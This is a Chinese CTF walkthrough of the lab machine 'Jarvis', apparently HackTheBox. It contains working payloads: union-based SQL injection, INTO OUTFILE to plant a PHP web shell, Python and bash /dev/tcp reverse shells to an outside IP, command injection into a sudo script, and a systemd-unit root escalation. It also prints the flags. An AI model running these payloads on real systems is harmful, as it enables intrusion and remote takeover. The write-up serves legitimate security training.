信息收集

IP Address	Opening Ports
10.10.10.143	TCP:22，80，64999

$ nmap -p- 10.10.10.143 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Stark Hotel
|_http-server-header: Apache/2.4.25 (Debian)
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & Web Reverse Shell

http://10.10.10.143

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图

http://10.10.10.143/room.php?cod=1

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图1

不幸的是，如果你尝试使用sqlmap自动注入则会被封禁IP

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图2

字段数量为7个

$ curl -s 'http://10.10.10.143/room.php?cod=1%20order%20by%207--+' | wc -c

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图3

http://10.10.10.143/room.php?cod=-1%20union%20select%201,2,3,4,5,6,7--+

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图4

http://10.10.10.143/room.php?cod=-1%20union%20select%201,GROUP_CONCAT(DISTINCT%20%20table_name),3,4,5,6,7%20FROM%20information_schema.columns--+

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图5

Table
room
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_CACHES
KEY_COLUMN_USAGE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
INNODB_SYS_DATAFILES
TABLE_STATISTICS
INNODB_SYS_TABLESTATS
USER_STATISTICS
INNODB_SYS_INDEXES
XTRADB_RSEG
INNODB_CMP_PER_INDEX
INNODB_TRX
CHANGED_PAGE_BITMAPS
INNODB_FT_BEING_DELETED
INNODB_LOCK_WAITS
INNODB_LOCKS
INNODB_TABLESPACES_ENCRYPTION
XTRADB_INTERNAL_HASH_TABLES
INNODB_SYS_FIELDS
INNODB_CMPMEM_RESET
INNODB_CMP
INNODB_FT_INDEX_TABLE
INNODB_SYS_TABLESPACES
INNODB_MUTEXES
INNODB_BUFFER_PAGE_LRU
INNODB_SYS_FOREIGN_COLS
INNODB_CMP_RESET
INNODB_BUFFER_POOL_STATS
INNODB_FT

http://10.10.10.143/room.php?cod=-1%20union%20select%201,LOAD_FILE(%27/etc/passwd%27),3,4,5,6,7--+

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图6

得知www-data的工作目录在/var/www/

http://10.10.10.143/room.php?cod=-1%20union%20select%201,%27%3C?php%20system($_GET[1]);phpinfo();?%3E%27,3,4,5,6,7%20INTO%20OUTFILE%20%27/var/www/html/reverse.php%27--+

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图7

$ curl 'http://10.10.10.143/reverse.php?1=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图8

www-data to pepper

$ sudo -l

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图9

我们可以使用pepper用户身份执行simpler.py文件

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图10

$ echo '$(cat /etc/passwd)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图11

$ echo 'L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNi4yNC8xMDAzNSAwPiYxIgo='|base64 -d >/tmp/rev.sh;chmod +x /tmp/rev.sh

$ echo '$(/tmp/rev.sh)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图12

User.txt

2354b15a6cb7ae36bfd2cb72f7b69b0d

权限提升

TRP00F自动化权限提升

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…插图13

Systemctl 权限提升

pwn.service

[Service]
Type=oneshot
ExecStart=/bin/bash -c '/bin/bash -i >&/dev/tcp/{re_ip}/{re_port} 0>&1'
[Install]
WantedBy=multi-user.target

$ systemctl link /tmp/pwn.service

$ systemctl start pwn.service

Root.txt

9d8eb89d70c481256f008375359affec

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…

信息收集

SQLI & Web Reverse Shell

www-data to pepper

User.txt

权限提升

TRP00F自动化权限提升

Systemctl 权限提升

Root.txt

相关文章

发布评论取消回复

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕…

信息收集

SQLI & Web Reverse Shell

www-data to pepper

User.txt

权限提升

TRP00F自动化权限提升

Systemctl 权限提升

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复